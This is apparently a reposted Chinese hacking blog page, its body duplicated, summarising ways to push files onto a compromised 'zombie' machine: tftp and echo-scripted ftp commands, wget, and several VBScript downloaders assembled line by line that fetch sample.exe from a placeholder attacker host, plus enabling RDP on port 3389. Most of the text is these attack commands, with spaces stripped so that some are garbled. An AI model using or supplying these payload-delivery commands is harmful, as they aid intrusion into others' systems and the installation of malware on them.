上传方法总结[对入侵很实用]
来源:互联网 发布:网络单机游戏大全论坛 编辑:程序博客网 时间:2024/05/16 04:56
<script type="text/javascript"><!--google_ad_client = "pub-2947489232296736";/* 728x15, 创建于 08-4-23MSDN */google_ad_slot = "3624277373";google_ad_width = 728;google_ad_height = 15;//--></script><script type="text/javascript"src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
作者:小虾米 来自:朋友的家
现在将本人用于上传的方法进行汇总如下:
1.tftp法
先在自己某机器上建个tftp服务器,如执行tftpd32.exe,
再将文件(sample.exe)上传到别的机器中(肉鸡),
肉鸡cmd中执行:tftp-i服务器ipgetsample.exe
2.ftp法
肉鸡cmd中执行:
echoopenftp服务器ip[端口]>ftp.txt
echousername>>ftp.txt
echopassword>>ftp.txt
echogetsample.exe>>ftp.txt
echobye>>ftp.txt
ftp-s:ftp.txt
delftp.txt
3.工具法
利用wineggdrop的wget.exe
肉鸡cmd中执行:wget/sample.exe
4.利用dl.vbe法
肉鸡cmd中执行:
echowithwscript:if.arguments.count^<2then.quit:endif>dl.vbe
echosetaso=.createobject("adodb.stream"):setweb=createobject("microsoft.xmlhttp")>>dl.vbe
echoweb.open"get",.arguments(0),0:web.send:ifweb.status^>200thenquit>>dl.vbe
echoaso.type=1:aso.open:aso.writeweb.responsebody:aso.savetofile.arguments(1),2:endwith>>dl.vbe
cscriptdl.vbehttp://*。*。*。*:88/sample.exesample.exe
5.利用iget.vbe法
方法同4,
肉鸡cmd中执行:
echoiLocal=LCase(WScript.Arguments(1))>iget.vbe
echoiRemote=LCase(WScript.Arguments(0))>>iget.vbe
echoSetxPost=CreateObject("Microsoft.HTTP")>>iget.vbe
echoxPost.Open"GET",iRemote,0>>iget.vbe
echoxPost.Send()>>iget.vbe
echoSetsGet=CreateObject("ADODB.Stream")>>iget.vbe
echosGet.Mode=3>>iget.vbe
echosGet.Type=1>>iget.vbe
echosGet.Open()>>iget.vbe
echosGet.Write(xPost.responseBody)>>iget.vbe
echosGet.SaveToFileiLocal,2>>iget.vbe
cscriptiget.vbehttp://*。*。*。*/sample.exesample.exe
6.利用Http网站vbe法
echoSetxPost=CreateObject("Microsoft.XMLHTTP")>dsa.vbe
echoxPost.Open"GET","http://*.*.*.*/sample.exe",0>>dsa.vbe
echoxPost.Send()>>dsa.vbe
echoSetsGet=CreateObject("ADODB.Stream")>>dsa.vbe
echosGet.Mode=3>>dsa.vbe
echosGet.Type=1>>dsa.vbe
echosGet.Open()>>dsa.vbe
echosGet.Write(xPost.responseBody)>>dsa.vbe
echosGet.SaveToFile"sample.exe",2>>dsa.vbe
cscriptdsa.vbe
deldsa.vbe
7.3389法
可以开3389,然后登陆,进行本地的下载。该方法对服务器上传很严格的机器特有效。(包括)
8.其他未公开的方法
<script type="text/javascript"><!--google_ad_client = "pub-2947489232296736";/* 728x15, 创建于 08-4-23MSDN */google_ad_slot = "3624277373";google_ad_width = 728;google_ad_height = 15;//--></script><script type="text/javascript"src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
<script type="text/javascript"><!--google_ad_client = "pub-2947489232296736";/* 160x600, 创建于 08-4-23MSDN */google_ad_slot = "4367022601";google_ad_width = 160;google_ad_height = 600;//--></script><script type="text/javascript"src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
作者:小虾米 来自:朋友的家
现在将本人用于上传的方法进行汇总如下:
1.tftp法
先在自己某机器上建个tftp服务器,如执行tftpd32.exe,
再将文件(sample.exe)上传到别的机器中(肉鸡),
肉鸡cmd中执行:tftp-i服务器ipgetsample.exe
2.ftp法
肉鸡cmd中执行:
echoopenftp服务器ip[端口]>ftp.txt
echousername>>ftp.txt
echopassword>>ftp.txt
echogetsample.exe>>ftp.txt
echobye>>ftp.txt
ftp-s:ftp.txt
delftp.txt
3.工具法
利用wineggdrop的wget.exe
肉鸡cmd中执行:wget/sample.exe
4.利用dl.vbe法
肉鸡cmd中执行:
echowithwscript:if.arguments.count^<2then.quit:endif>dl.vbe
echosetaso=.createobject("adodb.stream"):setweb=createobject("microsoft.xmlhttp")>>dl.vbe
echoweb.open"get",.arguments(0),0:web.send:ifweb.status^>200thenquit>>dl.vbe
echoaso.type=1:aso.open:aso.writeweb.responsebody:aso.savetofile.arguments(1),2:endwith>>dl.vbe
cscriptdl.vbehttp://*。*。*。*:88/sample.exesample.exe
5.利用iget.vbe法
方法同4,
肉鸡cmd中执行:
echoiLocal=LCase(WScript.Arguments(1))>iget.vbe
echoiRemote=LCase(WScript.Arguments(0))>>iget.vbe
echoSetxPost=CreateObject("Microsoft.HTTP")>>iget.vbe
echoxPost.Open"GET",iRemote,0>>iget.vbe
echoxPost.Send()>>iget.vbe
echoSetsGet=CreateObject("ADODB.Stream")>>iget.vbe
echosGet.Mode=3>>iget.vbe
echosGet.Type=1>>iget.vbe
echosGet.Open()>>iget.vbe
echosGet.Write(xPost.responseBody)>>iget.vbe
echosGet.SaveToFileiLocal,2>>iget.vbe
cscriptiget.vbehttp://*。*。*。*/sample.exesample.exe
6.利用Http网站vbe法
echoSetxPost=CreateObject("Microsoft.XMLHTTP")>dsa.vbe
echoxPost.Open"GET","http://*.*.*.*/sample.exe",0>>dsa.vbe
echoxPost.Send()>>dsa.vbe
echoSetsGet=CreateObject("ADODB.Stream")>>dsa.vbe
echosGet.Mode=3>>dsa.vbe
echosGet.Type=1>>dsa.vbe
echosGet.Open()>>dsa.vbe
echosGet.Write(xPost.responseBody)>>dsa.vbe
echosGet.SaveToFile"sample.exe",2>>dsa.vbe
cscriptdsa.vbe
deldsa.vbe
7.3389法
可以开3389,然后登陆,进行本地的下载。该方法对服务器上传很严格的机器特有效。(包括)
8.其他未公开的方法
<script type="text/javascript"><!--google_ad_client = "pub-2947489232296736";/* 728x15, 创建于 08-4-23MSDN */google_ad_slot = "3624277373";google_ad_width = 728;google_ad_height = 15;//--></script><script type="text/javascript"src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
<script type="text/javascript"><!--google_ad_client = "pub-2947489232296736";/* 160x600, 创建于 08-4-23MSDN */google_ad_slot = "4367022601";google_ad_width = 160;google_ad_height = 600;//--></script><script type="text/javascript"src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
- 上传方法总结[对入侵很实用]
- 上传方法总结[对入侵很实用]
- 黑客网络入侵实用方法
- 入侵权限提升方法总结
- 揭密黑客网络入侵的十四种实用方法!
- 总结SQL入侵的突破方法
- 总结SQL入侵中的突破方法
- SQL入侵恢复xp_cmdshell方法总结
- 开发调试实用方法总结
- android 实用方法的总结
- Linux入侵检查实用指令
- Linux入侵检查实用指令
- Linux入侵检查实用指令
- Linux入侵检查实用指令
- Linux入侵检查实用指令
- Linux入侵检查实用指令
- ASP漏洞+SQL注入的入侵方法总结
- 科研牛人对看文献,写论文的总结,很实用!
- 一次只设置一个目标
- 自定义维度汇总方式实现余额平均值
- IP的寻址规则
- 理解NULL如何影响IN和EXITS语句
- 连续编号的流水号拼接成一个字串的存储过程
- 上传方法总结[对入侵很实用]
- 2007年百度招聘在线笔试真题解答
- SYMANTEC内核溢出漏洞利用之返回法
- 探讨实体化视图的刷新机制
- 用INNERJOIN语法联接多个表建记录集
- 剪切板上文本数据的传送
- 真爱无声
- 创建自定义模板BuildingCustomTemplates
- [收藏]五种提高SQL性能的方法
